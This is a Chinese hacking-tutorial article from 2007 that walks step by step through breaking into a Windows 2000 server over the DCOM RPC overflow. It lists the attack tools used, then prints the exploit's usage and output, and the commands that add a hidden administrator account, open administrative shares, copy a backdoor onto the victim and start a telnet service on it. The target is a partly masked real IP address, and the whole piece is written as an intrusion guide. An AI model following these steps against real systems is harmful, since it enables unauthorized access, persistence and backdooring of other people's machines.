一步一步的入侵----only for you - 爱国者安全网新闻中心

通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码

电信 ┊ 网通 ┊ 铁通 ┊ 移动　

在线人

文章搜索：

热门搜索：红客黑鹰红客技术安全动画红客培训

　业内新闻漏洞公告病毒公告电脑知识网络知识菜鸟入门攻防教程黑客攻防安全编程工具使用综合安全个人安全安全相关 Q Q安全原创精华红客人物站内事件

您现在的位置：爱国者安全网 >> 文章类 >> 红客教程 >> 攻防教程 >> 文章正文

一步一步的入侵----only for you

责任编辑：酷酷の鱼　更新日期：2007-12-6

文章来源:安全中国

大家好，现在网上很流行dcomrpc，哈哈，那好就说说利用dcomrpc入侵。很入侵之后做的事情

需要的工具：
很好的：　radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom（通用溢出工具)
脚本开启telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe
代理：sksockserver.exe
后门程序：WinEggDropShellPro3thVersion

好了，该做的都做的差不多了。现在开始把~~

首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子，这个漏洞需要135端口开放，（想必

随便扫一下就会发现有许多主机开放的135端口）。。。。。。

(人走运座着都能检到钱) 211.217.50.xx　第一个主机就被扫出来又此漏洞。开始工作

看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k

哈哈，是win2k server版本

展开命令行：

[查看dcomrpc的用法　用法 dcomrpc -d <host> [options]　 ]

F:\hack>cd rpc\dcomrpc

RPC DCOM Expl01t coded by .:[oc192.us]:. Security

Complied and Modified by Expl01t www.longker.com

Usage:

dcomrpc -d <host> [options]
Options:
　 -d:　　　　Hostname to attack [Required]
　 -t:　　　　Type [Default: 0]
　 -r:　　　　Return address [Default: Selected from target]
　 -p:　　　　Attack port [Default: 135]
　 -l:　　　　Bindshell port [Default: 666]

Types:
　 0 [0x0018759f]: [Win2k-Universal]
　 1 [0x0100139d]: [WinXP-Universal]

开始进行溢出：
F:\hack>cd rpc\dcomrpc -d　211.217.50.xx 0

RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[+] Resolving host..
[+] Done.
[+] Expl01ting....Just wait......

等到出现，说明溢出成功
c:\winnt\system32>

接着我们建立用户

c:\winnt\system32>net user blueye$Content$nbsp;1111 /add
命令成功完成。

把用户添加成超级管理员
c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add
命令成功完成。

看看共享开了没有,没有的话把共享开开

c:\winnt\system32>net share
清单是空的。

c:\winnt\system32>net share ipc$Content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$Content$nbsp;
命令成功完成。

到这里我们入侵告一段落

[ 建立 IPC$Content$nbsp;连接，也可以使用tftp上传，先和对方建立连接]

F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp;

[ 上传一个后门程序到对方的主机里]

F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32

F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32

然后运行后门程序，我们可以使用at命令。但是有的机器把at明令禁止了，建议直接开起telnet
使用opentelnet.exe　关闭开启的telnet使用resumetelnet \\ip user password
如果忘记开共享可以使用脚本开启telnet来开共享，用法:
cscript telnet.vbe ip user password null port　 (null是验证方式)

F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567

F:\hack>telnet 211.217.50.xx 4567
省略...

连接并运行后门程序,运行后门程序命令　根目录：inject.exe -run
（后门使用方法和安装都在zip文件里面包含了）

[1] [2] 下一页

上一篇文章： RPC漏洞入侵

下一篇文章：入侵动网7.1SP1:靠博客得WebShell